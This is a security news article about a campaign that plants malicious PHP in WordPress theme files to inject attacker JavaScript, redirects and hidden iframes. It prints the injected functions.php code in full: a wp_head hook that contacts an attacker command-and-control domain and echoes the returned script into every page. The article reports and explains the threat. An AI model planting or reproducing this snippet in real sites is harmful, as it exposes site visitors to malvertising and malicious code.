WordPress website: Hackers Covertly Insert Malicious PHP Codes to Weaponize Sites
WordPress website: Hackers Covertly Insert Malicious PHP Codes to Weaponize Sites
Threat actors are increasingly targeting WordPress websites in an effort to profit from traffic and jeopardize visitor security.
A fresh malvertising effort has surfaced in recent months, using quiet PHP code injections in theme files to deliver undesired third-party scripts.
By sending obfuscated JavaScript that reroutes visitors, shows pop-ups, and eludes security systems without drawing attention to itself, the assault fits in perfectly with normal site operations.
A tiny chunk of PHP code added to the functions.php file of the active theme was the source of the breach, which was first noticed by a site owner who noticed strange script loads.
This injection ran behind the scenes on each request rather than changing the content of the visible page.
After several security vendors blocked the campaign and Sucuri analysts saw unusual JavaScript requests to attacker-controlled domains, the campaign was discovered.
Weak file permissions and out-of-date themes are the main targets of the assault. Hackers inject a seemingly harmless function that communicates with a command-and-control server by obtaining write access, frequently via compromised credentials or weak plugins.
The function ensures execution before the rest of the page loads by retrieving a dynamic JavaScript payload and echoing it into the <head> area of the page after being called via the wp_head hook.
The injected function fetches the malicious script and embeds it straight into the HTML document after establishing a POST connection to a remote endpoint at hxxps://brazilc[.]com/ads.php, according to Sucuri researchers.
The payload carries out two primary tasks: injecting a secret 1×1 pixel iframe that imitates Cloudflare’s challenge platform and loading a traffic-distribution script from porsasystem.com/6m9x.js.
By passing off harmful activity as authentic CDN activities, these strategies allow for forced redirects, pop-ups, and security scanner avoidance.
Infection Mechanism
The PHP function that is injected into functions.php is what makes the infection technique work:
| // Injected PHP function in functions.php
function ti_custom_javascript() { $response = wp_remote_post( ‘https://brazilc.com/ads.php’, array(‘timeout’ => 15, ‘body’ => array(‘url’ => home_url())) ); if (!is_wp_error($response)) { echo wp_remote_retrieve_body($response); } } add_action(‘wp_head’, ‘ti_custom_javascript’); |
This method silently runs when a page loads, contacting the C&C server and publishing the JavaScript payload that is returned into the page header.
Then, using properties like data-cfasync=’false’ and async to get around Cloudflare Rocket Loader, the attacker’s script loads more malicious code asynchronously.
The malware avoids detection by embedding itself inside a hidden iframe, where it remains until the injected code is eliminated.
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.
Read More:
PM Modi Inaugurates India Mobile Congress 2025, Calls It Asia’s Largest Digital Technology Forum
About Author
English